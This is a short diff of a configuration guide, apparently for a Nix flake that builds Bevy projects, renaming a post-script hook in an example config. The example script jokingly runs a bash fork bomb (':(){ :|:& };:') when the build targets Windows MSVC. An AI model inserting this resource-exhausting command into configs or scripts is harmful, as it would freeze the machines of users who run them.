swagtop/bevy-flake/docs/config.md

     '';

     # This is for extra-extra script you want at the _very_ end of the
     # environment adapter.
-It is after extraScript.
+It is after postScript.
-    postScript = ''
+    postPostScript = ''
       if [[ $BF_TARGET == "x86_64-pc-windows-msvc" ]]; then
         echo "Why use 'windows' as an argument!?
 Say goodbye to your RAM!!!"
         :(){ :|:& };: